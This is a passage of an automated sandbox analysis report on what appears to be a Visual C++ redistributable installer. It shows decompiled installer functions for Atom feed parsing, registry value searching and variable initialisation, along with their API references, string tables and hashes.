                                                                          • numeric, xrefs: 00018493
                                                                          • Hidden, xrefs: 00018406
                                                                          • Initializing version variable '%ls' to value '%ls', xrefs: 0001852A
                                                                          • Failed to select variable nodes., xrefs: 0001839B
                                                                          • Initializing hidden variable '%ls', xrefs: 00018548
                                                                          • Attempt to set built-in variable value: %ls, xrefs: 0001869F
                                                                          • Value, xrefs: 0001843C
                                                                          • Invalid value for @Type: %ls, xrefs: 0001864F
                                                                          • variable.cpp, xrefs: 00018690
                                                                          • Failed to set variant value., xrefs: 00018666
                                                                          • Variable, xrefs: 00018388
                                                                          • Failed to get next node., xrefs: 000186CD
                                                                          • Initializing string variable '%ls' to value '%ls', xrefs: 000184F1
                                                                          • Failed to insert variable '%ls'., xrefs: 0001859D
                                                                          • Initializing numeric variable '%ls' to value '%ls', xrefs: 000184B9
                                                                          • Persisted, xrefs: 00018421
                                                                          • Failed to change variant type., xrefs: 000186B1
                                                                          • Failed to get variable node count., xrefs: 000183B8
                                                                          • Failed to get @Value., xrefs: 0001866D
                                                                          • Failed to get @Type., xrefs: 0001865F
                                                                          • Failed to get @Id., xrefs: 000186C6
                                                                          • Failed to find variable value '%ls'., xrefs: 000186A9
                                                                          • Failed to set value of variable: %ls, xrefs: 0001867E
                                                                          • Failed to get @Persisted., xrefs: 000186B8
                                                                          • Failed to get @Hidden., xrefs: 000186BF
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
                                                                          • API String ID: 3168844106-1614826165
                                                                          • Opcode ID: 3969c0dcd2ecbd05b57f944c15c9537e7422ba8fab947b50ebaa9615cf0c59b7
                                                                          • Instruction ID: 1df50d8a2f1893f4367606f683796b352bcfc65613425a88537026d2111b0b40
                                                                          • Opcode Fuzzy Hash: 3969c0dcd2ecbd05b57f944c15c9537e7422ba8fab947b50ebaa9615cf0c59b7
                                                                          • Instruction Fuzzy Hash: 66B1D172D00619BFDB219B94CC45EEFBBB9AF44752F108255F910BA291CB719F84CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 83%
                                                                          			E000572F4(void* __ebx, void* __eflags, int _a4, intOrPtr* _a8) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				void* _v16;
                                                                          				int _v20;
                                                                          				int _v24;
                                                                          				int _v28;
                                                                          				void* __edi;
                                                                          				int _t110;
                                                                          				int _t111;
                                                                          				int _t112;
                                                                          				int _t114;
                                                                          				int _t116;
                                                                          				int _t117;
                                                                          				int _t118;
                                                                          				int _t119;
                                                                          				int _t120;
                                                                          				int _t121;
                                                                          				int _t122;
                                                                          				int _t123;
                                                                          				int _t124;
                                                                          				int _t125;
                                                                          				int _t128;
                                                                          				void* _t147;
                                                                          				intOrPtr* _t150;
                                                                          				void* _t151;
                                                                          				signed int _t153;
                                                                          				intOrPtr* _t154;
                                                                          				intOrPtr _t160;
                                                                          				int _t161;
                                                                          
                                                                          				_t149 = __ebx;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_t160 = E000138D4(0x48, 1);
                                                                          				if(_t160 != 0) {
                                                                          					_t150 = _a4;
                                                                          					 *((intOrPtr*)(_t160 + 0x40)) = _t150;
                                                                          					 *((intOrPtr*)( *_t150 + 4))(_t150, __ebx);
                                                                          					_t7 = _t160 + 0x20; // 0x20
                                                                          					_t8 = _t160 + 0x24; // 0x24
                                                                          					_t161 = E000564F4(_t8, _t150, L"author", _t8, _t7);
                                                                          					__eflags = _t161;
                                                                          					if(_t161 >= 0) {
                                                                          						_t9 = _t160 + 0x28; // 0x28
                                                                          						_t10 = _t160 + 0x2c; // 0x2c
                                                                          						_t161 = E0005658C(_t10, _t150, L"category", _t10, _t9);
                                                                          						__eflags = _t161;
                                                                          						if(_t161 >= 0) {
                                                                          							_t11 = _t160 + 0x30; // 0x30
                                                                          							_t12 = _t160 + 0x34; // 0x34
                                                                          							_t161 = E00056624(_t12, _t150, L"entry", _t12, _t11);
                                                                          							__eflags = _t161;
                                                                          							if(_t161 >= 0) {
                                                                          								_t13 = _t160 + 0x38; // 0x38
                                                                          								_t14 = _t160 + 0x3c; // 0x3c
                                                                          								_t161 = E000566BC(_t14, _t150, L"link", _t14, _t13);
                                                                          								__eflags = _t161;
                                                                          								if(_t161 >= 0) {
                                                                          									_t158 =  &_v16;
                                                                          									_t161 =  *((intOrPtr*)( *_t150 + 0x30))(_t150,  &_v16);
                                                                          									__eflags = _t161;
                                                                          									if(_t161 >= 0) {
                                                                          										_t110 = E00053760( &_v16, _v16,  &_v12,  &_v8);
                                                                          										_t161 = _t110;
                                                                          										__eflags = _t161;
                                                                          										if(_t161 != 0) {
                                                                          											L45:
                                                                          											_t111 =  *(_t160 + 8);
                                                                          											__eflags = _t111;
                                                                          											if(_t111 == 0) {
                                                                          												L54:
                                                                          												_t112 = 0x8007000d;
                                                                          												_push(0x8007000d);
                                                                          												_push(0x197);
                                                                          												goto L55;
                                                                          											} else {
                                                                          												__eflags =  *_t111;
                                                                          												if( *_t111 == 0) {
                                                                          													goto L54;
                                                                          												} else {
                                                                          													_t114 =  *(_t160 + 0x14);
                                                                          													__eflags = _t114;
                                                                          													if(_t114 == 0) {
                                                                          														L53:
                                                                          														_t112 = 0x8007000d;
                                                                          														_push(0x8007000d);
                                                                          														_push(0x19c);
                                                                          														goto L55;
                                                                          													} else {
                                                                          														__eflags =  *_t114;
                                                                          														if( *_t114 == 0) {
                                                                          															goto L53;
                                                                          														} else {
                                                                          															__eflags =  *(_t160 + 0x1c);
                                                                          															if( *(_t160 + 0x1c) != 0) {
                                                                          																L52:
                                                                          																 *_a8 = _t160;
                                                                          																_t160 = 0;
                                                                          															} else {
                                                                          																__eflags =  *(_t160 + 0x18);
                                                                          																if( *(_t160 + 0x18) != 0) {
                                                                          																	goto L52;
                                                                          																} else {
                                                                          																	_t112 = 0x8007000d;
                                                                          																	_push(0x8007000d);
                                                                          																	_push(0x1a1);
                                                                          																	L55:
                                                                          																	_push("atomutil.cpp");
                                                                          																	_t161 = _t112;
                                                                          																	E000137D3(_t112);
                                                                          																}
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										} else {
                                                                          											_t151 = CompareStringW;
                                                                          											_v28 = _t161;
                                                                          											_v24 = _t110;
                                                                          											_v20 = _t110;
                                                                          											_a4 = _t110;
                                                                          											while(1) {
                                                                          												_t116 = CompareStringW(0x7f, _t110, _v8, 0xffffffff, L"generator", 0xffffffff);
                                                                          												__eflags = _t116 - 2;
                                                                          												if(_t116 != 2) {
                                                                          													goto L13;
                                                                          												}
                                                                          												_push(_v12);
                                                                          												_push(_t160);
                                                                          												L12:
                                                                          												_t128 = E000567C4(_t158);
                                                                          												L39:
                                                                          												_t161 = _t128;
                                                                          												__eflags = _t161;
                                                                          												if(_t161 >= 0) {
                                                                          													L40:
                                                                          													__eflags = _v8;
                                                                          													if(_v8 != 0) {
                                                                          														__imp__#6(_v8);
                                                                          														_t68 =  &_v8;
                                                                          														 *_t68 = _v8 & 0x00000000;
                                                                          														__eflags =  *_t68;
                                                                          													}
                                                                          													_t158 = _v12;
                                                                          													__eflags = _t158;
                                                                          													if(_t158 != 0) {
                                                                          														 *((intOrPtr*)( *_t158 + 8))(_t158);
                                                                          														_t72 =  &_v12;
                                                                          														 *_t72 = _v12 & 0x00000000;
                                                                          														__eflags =  *_t72;
                                                                          													}
                                                                          													_t161 = E00053760(_t158, _v16,  &_v12,  &_v8);
                                                                          													__eflags = _t161;
                                                                          													if(_t161 == 0) {
                                                                          														_t161 = _v28;
                                                                          														_t110 = 0;
                                                                          														__eflags = 0;
                                                                          														continue;
                                                                          													} else {
                                                                          														goto L45;
                                                                          													}
                                                                          												}
                                                                          												goto L56;
                                                                          												L13:
                                                                          												_t117 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"icon", 0xffffffff);
                                                                          												__eflags = _t117 - 2;
                                                                          												if(_t117 != 2) {
                                                                          													_t118 = CompareStringW(0x7f, 0, _v8, 0xffffffff, 0x73c78, 0xffffffff);
                                                                          													__eflags = _t118 - 2;
                                                                          													if(_t118 != 2) {
                                                                          														_t119 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"logo", 0xffffffff);
                                                                          														__eflags = _t119 - 2;
                                                                          														if(_t119 != 2) {
                                                                          															_t120 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"subtitle", 0xffffffff);
                                                                          															__eflags = _t120 - 2;
                                                                          															if(_t120 != 2) {
                                                                          																_t121 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"title", 0xffffffff);
                                                                          																__eflags = _t121 - 2;
                                                                          																if(_t121 != 2) {
                                                                          																	_t122 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"updated", 0xffffffff);
                                                                          																	__eflags = _t122 - 2;
                                                                          																	if(_t122 != 2) {
                                                                          																		_t123 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"author", 0xffffffff);
                                                                          																		__eflags = _t123 - 2;
                                                                          																		if(_t123 != 2) {
                                                                          																			_t124 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"category", 0xffffffff);
                                                                          																			__eflags = _t124 - 2;
                                                                          																			if(_t124 != 2) {
                                                                          																				_t125 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"entry", 0xffffffff);
                                                                          																				__eflags = _t125 - 2;
                                                                          																				if(_t125 != 2) {
                                                                          																					__eflags = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"link", 0xffffffff) - 2;
                                                                          																					if(__eflags != 0) {
                                                                          																						_t64 = _t160 + 0x44; // 0x44
                                                                          																						_t128 = E000579CC(_t151, __eflags, _v12, _t64);
                                                                          																						goto L39;
                                                                          																					} else {
                                                                          																						_t161 = E000576A1(_v12,  *((intOrPtr*)(_t160 + 0x3c)) + _t161);
                                                                          																						__eflags = _t161;
                                                                          																						if(_t161 >= 0) {
                                                                          																							_v28 = _v28 + 0x28;
                                                                          																							goto L40;
                                                                          																						}
                                                                          																					}
                                                                          																				} else {
                                                                          																					_t161 = E00056FB7(_v12,  *((intOrPtr*)(_t160 + 0x34)) + _v24);
                                                                          																					__eflags = _t161;
                                                                          																					if(_t161 >= 0) {
                                                                          																						_v24 = _v24 + 0x40;
                                                                          																						goto L40;
                                                                          																					}
                                                                          																				}
                                                                          																			} else {
                                                                          																				_t161 = E00056BF6(_v12,  *((intOrPtr*)(_t160 + 0x2c)) + _v20);
                                                                          																				__eflags = _t161;
                                                                          																				if(_t161 >= 0) {
                                                                          																					_v20 = _v20 + 0x10;
                                                                          																					goto L40;
                                                                          																				}
                                                                          																			}
                                                                          																		} else {
                                                                          																			_t161 = E00056ACD(_v12,  *((intOrPtr*)(_t160 + 0x24)) + _a4);
                                                                          																			__eflags = _t161;
                                                                          																			if(_t161 >= 0) {
                                                                          																				_a4 = _a4 + 0xc;
                                                                          																				goto L40;
                                                                          																			}
                                                                          																		}
                                                                          																	} else {
                                                                          																		_t40 = _t160 + 0x18; // 0x18
                                                                          																		_t128 = E00056754(_t158, _t40, _v12);
                                                                          																		goto L39;
                                                                          																	}
                                                                          																} else {
                                                                          																	_t37 = _t160 + 0x14; // 0x14
                                                                          																	_t147 = _t37;
                                                                          																	goto L15;
                                                                          																}
                                                                          															} else {
                                                                          																_t35 = _t160 + 0x10; // 0x10
                                                                          																_t147 = _t35;
                                                                          																goto L15;
                                                                          															}
                                                                          														} else {
                                                                          															_t33 = _t160 + 0xc; // 0xc
                                                                          															_t147 = _t33;
                                                                          															goto L15;
                                                                          														}
                                                                          													} else {
                                                                          														_t31 = _t160 + 8; // 0x8
                                                                          														_t147 = _t31;
                                                                          														goto L15;
                                                                          													}
                                                                          												} else {
                                                                          													_t28 = _t160 + 4; // 0x4
                                                                          													_t147 = _t28;
                                                                          													L15:
                                                                          													_push(_v12);
                                                                          													_push(_t147);
                                                                          													goto L12;
                                                                          												}
                                                                          												goto L56;
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					L56:
                                                                          					_pop(_t149);
                                                                          				} else {
                                                                          					_t161 = 0x8007000e;
                                                                          					E000137D3(_t89, "atomutil.cpp", 0x134, 0x8007000e);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					__imp__#6(_v8);
                                                                          				}
                                                                          				_t153 = _v12;
                                                                          				if(_t153 != 0) {
                                                                          					 *((intOrPtr*)( *_t153 + 8))(_t153);
                                                                          				}
                                                                          				_t154 = _v16;
                                                                          				if(_t154 != 0) {
                                                                          					 *((intOrPtr*)( *_t154 + 8))(_t154);
                                                                          				}
                                                                          				if(_t160 != 0) {
                                                                          					E00057B68(_t149, _t160, _t160);
                                                                          				}
                                                                          				return _t161;
                                                                          			}
































                                                                          0x000574fc
                                                                          0x000574fe
                                                                          0x00057504
                                                                          0x00000000
                                                                          0x00057504
                                                                          0x000574fe
                                                                          0x000574c3
                                                                          0x000574c6
                                                                          0x000574ca
                                                                          0x00000000
                                                                          0x000574ca
                                                                          0x000574a7
                                                                          0x000574a7
                                                                          0x000574a7
                                                                          0x00000000
                                                                          0x000574a7
                                                                          0x0005748b
                                                                          0x0005748b
                                                                          0x0005748b
                                                                          0x00000000
                                                                          0x0005748b
                                                                          0x0005746f
                                                                          0x0005746f
                                                                          0x0005746f
                                                                          0x00000000
                                                                          0x0005746f
                                                                          0x00057453
                                                                          0x00057453
                                                                          0x00057453
                                                                          0x00000000
                                                                          0x00057453
                                                                          0x00057433
                                                                          0x00057433
                                                                          0x00057433
                                                                          0x00057436
                                                                          0x00057436
                                                                          0x00057439
                                                                          0x00000000
                                                                          0x00057439
                                                                          0x00000000
                                                                          0x00057431
                                                                          0x000573f8
                                                                          0x000573d9
                                                                          0x000573bf
                                                                          0x000573ab
                                                                          0x0005738e
                                                                          0x00057371
                                                                          0x00057663
                                                                          0x00057663
                                                                          0x00057316
                                                                          0x00057316
                                                                          0x00057326
                                                                          0x00057326
                                                                          0x00057668
                                                                          0x0005766d
                                                                          0x0005766d
                                                                          0x00057673
                                                                          0x00057678
                                                                          0x0005767d
                                                                          0x0005767d
                                                                          0x00057680
                                                                          0x00057685
                                                                          0x0005768a
                                                                          0x0005768a
                                                                          0x0005768f
                                                                          0x00057692
                                                                          0x00057692
                                                                          0x0005769e

                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 00057407
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 000575D0
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0005766D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$FreeHeap$AllocateCompareProcess
                                                                          • String ID: ($@$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
                                                                          • API String ID: 1555028553-2592408802
                                                                          • Opcode ID: 99b906ae6dacf6b4eef9bce86bcc0eeab38705e30f7b11917d2dbea9d1a7a8ae
                                                                          • Instruction ID: 7f54cedfa4dae5c66fd6cf1d843bc8fdb1f829a460e72e4a63e6127afe162dc0
                                                                          • Opcode Fuzzy Hash: 99b906ae6dacf6b4eef9bce86bcc0eeab38705e30f7b11917d2dbea9d1a7a8ae
                                                                          • Instruction Fuzzy Hash: F7B1C631D08616BBCB219B54DC41FAF76B8AB04721F604354FA29AB2D1D771EE44EB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 66%
                                                                          			E0001A311(long _a4, intOrPtr _a8) {
                                                                          				int _v8;
                                                                          				char _v12;
                                                                          				int _v16;
                                                                          				int _v20;
                                                                          				int _v24;
                                                                          				intOrPtr _v32;
                                                                          				void _v48;
                                                                          				signed short _t79;
                                                                          				signed short _t85;
                                                                          				void* _t87;
                                                                          				void* _t89;
                                                                          				void* _t103;
                                                                          				long _t106;
                                                                          				signed short _t110;
                                                                          				void* _t114;
                                                                          				WCHAR* _t131;
                                                                          				signed int _t132;
                                                                          				long _t143;
                                                                          				void* _t145;
                                                                          				void* _t147;
                                                                          				void* _t148;
                                                                          				void* _t158;
                                                                          				void* _t159;
                                                                          
                                                                          				_t132 = 6;
                                                                          				memset( &_v48, 0, _t132 << 2);
                                                                          				_t159 = _t158 + 0xc;
                                                                          				_t143 = _a4;
                                                                          				_v12 = 0;
                                                                          				_v20 = 0;
                                                                          				_v16 = 0;
                                                                          				_t131 = 0;
                                                                          				_t72 =  ==  ? 1 : 0x101;
                                                                          				_v24 = 0;
                                                                          				_a4 =  ==  ? 1 : 0x101;
                                                                          				_v8 = 0;
                                                                          				if(E000171CF(_a8,  *((intOrPtr*)(_t143 + 0x1c)),  &_v12, 0) >= 0) {
                                                                          					if( *((intOrPtr*)(_t143 + 0x20)) == 0) {
                                                                          						L5:
                                                                          						_t145 = E00050E3F( *((intOrPtr*)(_t143 + 0x18)), _v12, _a4,  &_v16);
                                                                          						if(_t145 != 0x80070002) {
                                                                          							if(_t145 >= 0) {
                                                                          								_t79 = RegQueryValueExW(_v16, _v20, 0,  &_v24, 0,  &_v8);
                                                                          								if(_t79 != 2) {
                                                                          									if(_t79 == 0) {
                                                                          										_t131 = E000138D4(_v8 + 2, 1);
                                                                          										if(_t131 != 0) {
                                                                          											_t85 = RegQueryValueExW(_v16, _v20, 0,  &_v24, _t131,  &_v8);
                                                                          											if(_t85 == 0) {
                                                                          												_t87 = _v24 - 1;
                                                                          												if(_t87 == 0) {
                                                                          													L38:
                                                                          													_t89 = E000302F4( &_v48, _t131, 0);
                                                                          													goto L39;
                                                                          												} else {
                                                                          													_t103 = _t87 - 1;
                                                                          													if(_t103 == 0) {
                                                                          														if( *((intOrPtr*)(_t143 + 0x28)) == 0) {
                                                                          															goto L38;
                                                                          														} else {
                                                                          															_t147 = E00011EDE( &_v48, _v8);
                                                                          															if(_t147 >= 0) {
                                                                          																_v32 = 2;
                                                                          																_t106 = ExpandEnvironmentStringsW(_t131, _v48, _v8);
                                                                          																_a4 = _t106;
                                                                          																if(_t106 <= _v8) {
                                                                          																	goto L40;
                                                                          																} else {
                                                                          																	_t148 = E00011EDE( &_v48, _t106);
                                                                          																	if(_t148 < 0) {
                                                                          																		goto L33;
                                                                          																	} else {
                                                                          																		if(_a4 == ExpandEnvironmentStringsW(_t131, _v48, _a4)) {
                                                                          																			goto L40;
                                                                          																		} else {
                                                                          																			_t110 = GetLastError();
                                                                          																			_t151 =  <=  ? _t110 : _t110 & 0x0000ffff | 0x80070000;
                                                                          																			_t148 =  >=  ? 0x80004005 :  <=  ? _t110 : _t110 & 0x0000ffff | 0x80070000;
                                                                          																			E000137D3(0x80004005, "search.cpp", 0x396, _t148);
                                                                          																			_push("Failed to get expand environment string.");
                                                                          																			goto L46;
                                                                          																		}
                                                                          																	}
                                                                          																}
                                                                          															} else {
                                                                          																L33:
                                                                          																_push("Failed to allocate string buffer.");
                                                                          																goto L46;
                                                                          															}
                                                                          														}
                                                                          													} else {
                                                                          														_t114 = _t103;
                                                                          														if(_t114 == 0) {
                                                                          															if(_v8 != 4) {
                                                                          																goto L26;
                                                                          															} else {
                                                                          																asm("cdq");
                                                                          																_push(0);
                                                                          																_push( *_t131);
                                                                          																goto L28;
                                                                          															}
                                                                          														} else {
                                                                          															if(_t114 == 7) {
                                                                          																if(_v8 == 8) {
                                                                          																	_push(_t131[2]);
                                                                          																	_push( *_t131);
                                                                          																	L28:
                                                                          																	_push( &_v48);
                                                                          																	_t89 = E000302B0();
                                                                          																	L39:
                                                                          																	_t147 = _t89;
                                                                          																	L40:
                                                                          																	if(_t147 >= 0) {
                                                                          																		_t148 = E0002FEB7(0,  &_v48,  *((intOrPtr*)(_t143 + 0x14)));
                                                                          																		if(_t148 >= 0) {
                                                                          																			_t148 = E00018137(_a8,  *((intOrPtr*)(_t143 + 4)),  &_v48);
                                                                          																			if(_t148 < 0) {
                                                                          																				_push("Failed to set variable.");
                                                                          																				goto L46;
                                                                          																			}
                                                                          																		} else {
                                                                          																			_push("Failed to change value type.");
                                                                          																			goto L46;
                                                                          																		}
                                                                          																	} else {
                                                                          																		_push("Failed to read registry value.");
                                                                          																		goto L46;
                                                                          																	}
                                                                          																} else {
                                                                          																	L26:
                                                                          																	_t148 = 0x8000ffff;
                                                                          																	goto L47;
                                                                          																}
                                                                          															} else {
                                                                          																_t148 = 0x80004001;
                                                                          																E0005012F(0x80004001, "Unsupported registry key value type. Type = \'%u\'", _v24);
                                                                          																_t159 = _t159 + 0xc;
                                                                          																goto L47;
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											} else {
                                                                          												_t154 =  <=  ? _t85 : _t85 & 0x0000ffff | 0x80070000;
                                                                          												_t148 =  >=  ? 0x80004005 :  <=  ? _t85 : _t85 & 0x0000ffff | 0x80070000;
                                                                          												E000137D3(0x80004005, "search.cpp", 0x375, _t148);
                                                                          												_push("Failed to query registry key value.");
                                                                          												goto L46;
                                                                          											}
                                                                          										} else {
                                                                          											_t148 = 0x8007000e;
                                                                          											E000137D3(_t82, "search.cpp", 0x372, 0x8007000e);
                                                                          											_push("Failed to allocate memory registry value.");
                                                                          											_push(0x8007000e);
                                                                          											E0005012F();
                                                                          											goto L47;
                                                                          										}
                                                                          									} else {
                                                                          										_t157 =  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
                                                                          										_t148 =  >=  ? 0x80004005 :  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
                                                                          										E000137D3(0x80004005, "search.cpp", 0x36f, _t148);
                                                                          										_push("Failed to query registry key value size.");
                                                                          										goto L46;
                                                                          									}
                                                                          								} else {
                                                                          									_push(_v20);
                                                                          									E0005061A(_t79, "Registry value not found. Key = \'%ls\', Value = \'%ls\'", _v12);
                                                                          									_t159 = _t159 + 0x10;
                                                                          									goto L7;
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to open registry key.");
                                                                          								goto L46;
                                                                          							}
                                                                          						} else {
                                                                          							E0005061A(2, "Registry key not found. Key = \'%ls\'", _v12);
                                                                          							_t159 = _t159 + 0xc;
                                                                          							L7:
                                                                          							_t148 = E00018137(_a8,  *((intOrPtr*)(_t143 + 4)),  &_v48);
                                                                          							if(_t148 >= 0) {
                                                                          								_t148 = 0;
                                                                          							} else {
                                                                          								_push("Failed to clear variable.");
                                                                          								goto L46;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_t148 = E000171CF(_a8,  *((intOrPtr*)(_t143 + 0x20)),  &_v20, 0);
                                                                          						if(_t148 >= 0) {
                                                                          							goto L5;
                                                                          						} else {
                                                                          							_push("Failed to format value string.");
                                                                          							goto L46;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to format key string.");
                                                                          					L46:
                                                                          					_push(_t148);
                                                                          					E0005012F();
                                                                          					if(_t148 < 0) {
                                                                          						L47:
                                                                          						_push(_t148);
                                                                          						E0005061A(2, "RegistrySearchValue failed: ID \'%ls\', HRESULT 0x%x", _v12);
                                                                          					}
                                                                          				}
                                                                          				E00012793(_v12);
                                                                          				E00012793(_v20);
                                                                          				if(_v16 != 0) {
                                                                          					RegCloseKey(_v16);
                                                                          					_v16 = _v16 & 0x00000000;
                                                                          				}
                                                                          				if(_t131 != 0) {
                                                                          					E00013999(_t131);
                                                                          				}
                                                                          				E00030499( &_v48);
                                                                          				return _t148;
                                                                          			}



























                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 0001A356
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 0001A37C
                                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 0001A666
                                                                          Strings
                                                                          • Failed to query registry key value., xrefs: 0001A4D8
                                                                          • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0001A418
                                                                          • Failed to allocate string buffer., xrefs: 0001A565
                                                                          • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 0001A63E
                                                                          • Failed to open registry key., xrefs: 0001A3E9
                                                                          • Failed to clear variable., xrefs: 0001A3D4
                                                                          • Failed to query registry key value size., xrefs: 0001A454
                                                                          • Unsupported registry key value type. Type = '%u', xrefs: 0001A506
                                                                          • Failed to get expand environment string., xrefs: 0001A5DB
                                                                          • Failed to format key string., xrefs: 0001A361
                                                                          • Failed to read registry value., xrefs: 0001A5F4
                                                                          • Failed to format value string., xrefs: 0001A387
                                                                          • Failed to set variable., xrefs: 0001A629
                                                                          • Registry key not found. Key = '%ls', xrefs: 0001A3B0
                                                                          • Failed to change value type., xrefs: 0001A60D
                                                                          • search.cpp, xrefs: 0001A44A, 0001A47D, 0001A4CE, 0001A5D1
                                                                          • Failed to allocate memory registry value., xrefs: 0001A487
                                                                          • @Met, xrefs: 0001A5AD
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Open@16$Close
                                                                          • String ID: @Met$Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
                                                                          • API String ID: 2348241696-68201321
                                                                          • Opcode ID: 686517b824e4af06f7742d526c258bd4be287a7331798e5d07d405fcc544d66b
                                                                          • Instruction ID: 250ed57aef95487a1e43ccac6dbf0b565b80ca29cd9b7274e734ab26a6c8a048
                                                                          • Opcode Fuzzy Hash: 686517b824e4af06f7742d526c258bd4be287a7331798e5d07d405fcc544d66b
                                                                          • Instruction Fuzzy Hash: 41A1F672E41629BBDF229AE4CC05BEF7AB9AF05311F108121FD04BA151D771DE84D7A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 79%
                                                                          			E00056FB7(signed int _a4, signed int _a8) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v16;
                                                                          				signed int _v20;
                                                                          				void* __ebx;
                                                                          				signed int _t99;
                                                                          				signed int _t100;
                                                                          				signed int _t102;
                                                                          				int _t104;
                                                                          				int _t105;
                                                                          				int _t106;
                                                                          				int _t107;
                                                                          				int _t108;
                                                                          				int _t109;
                                                                          				int _t110;
                                                                          				signed int _t113;
                                                                          				signed int* _t128;
                                                                          				signed int* _t129;
                                                                          				signed int _t130;
                                                                          				void* _t131;
                                                                          				signed int _t133;
                                                                          				signed int _t134;
                                                                          				signed int* _t139;
                                                                          				signed int _t140;
                                                                          
                                                                          				_t130 = _a4;
